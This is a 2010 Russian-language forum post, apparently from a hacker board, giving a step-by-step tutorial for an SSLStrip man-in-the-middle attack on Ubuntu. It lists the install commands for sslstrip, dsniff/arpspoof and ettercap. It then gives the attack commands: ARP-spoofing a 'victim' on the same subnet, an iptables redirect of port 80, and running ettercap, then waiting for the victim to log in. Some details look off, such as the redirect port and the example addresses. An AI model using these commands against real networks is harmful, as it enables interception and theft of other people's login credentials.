*Drive*- Здесь рулят padonki
https://drivesource.ru/

SSLStrip Шаг за Шагом на Убунту
https://drivesource.ru/viewtopic.php?f=15&t=1191
Страница 1 из 1

Автор:  Padonak [ 13 дек 2010, 23:48 ]
Заголовок сообщения:  SSLStrip Шаг за Шагом на Убунту

SSLStrip Шаг за Шагом на Убунту

В статье http://www.xakep.ru/magazine/xa/125/026/1.asp в принципе всё и понятно написано, но всё же в Убунту есть свои нюансы.

Для дальнейшей работы нам необходимо:

1. SSLStrip
2. arpspoof
3. ettercap
4. ubuntu linux (пример показан на Karmic Koala 9.10)
5. сетевое подключение
6. жертва из той же подсети


Скачаем SSLStrip с сайта http://www.thoughtcrime.org/software/sslstrip/

Вы скачаете архив sslstrip-0.6.tar.gz (версия может быть другая)

Мы же кул хацкеры)))) и будем разархивировать через терминал!
1, Открываем терминал.
2. Заходим в папку с архивом.
3. и пишем своими ручками "tar -zxvf sslstrip-0.6.tar.gz"'
4. заходим в появившуюся папку sslstrip-0.6(всё в терминале)
5. пишем sudo python setup.py build
6. и следующая команда sudo python setup.py install

Всё SSLStrip установлен.

Теперь я покажу как это приблизительно выглядело у меня

sagnat@sagnat-desktop:~$ ls
sagnat@sagnat-desktop:~$ cd Загрузки
sagnat@sagnat-desktop/Загрузки:~$ ls
sagnat@sagnat-desktop/Загрузки:~$ tar -zxvf sslstrip-0.6.tar.gz
sagnat@sagnat-desktop/Загрузки:~$ ls
sagnat@sagnat-desktop/Загрузки:~$ cd sslstrip-0.6
sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ python setup.py build
sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ sudo python setup.py install

Естественно я печать всё, что происходит у меня на компе не буду ну приблизительно установка выглядит так.

Что там у нас по списку?))))

Надо установить arpspoof.
Это всё проще простого)))
Пишем в терминале sudo apt-get install dsniff вводим пароль и всё))

Установка ettercap почти такая же: sudo apt-get install ettercap

Если вы не помните свой IP введите в терминале ifconfig.

Ещё вам будет нужен адрес шлюза это всё узнаётся вот ip route show | grep default | awk '{ print $3}' так.

И наконец самое интересное, откройте в своём терминале 3 вкладки

в одной запустите sudo arpspoof -i eth0 -t <Шлюз>
-i это сетевое соединение
-t это target - цель
выглядит эта форма вот так: sudo arpspoof -i eth0 -t 172.168.1.4 172.168.1.1

в другой введите sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
1000 - это прослушиваемый порт обычно ставиться на 8080
и запускаем sslstrip: sudo sslstrip

ну и в третьей вкладке запускаем ettercap: sudo ettercap -Tqz


Ждём когда жертва войдёт на какой-нибудь сайт.

Автор:  Padonak [ 14 дек 2010, 01:33 ]
Заголовок сообщения: 

http://nnm.ru/blogs/_victor_/ptraffer_- ... na_ubuntu/

Страница 1 из 1 Часовой пояс: UTC + 3 часа [ Летнее время ]
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/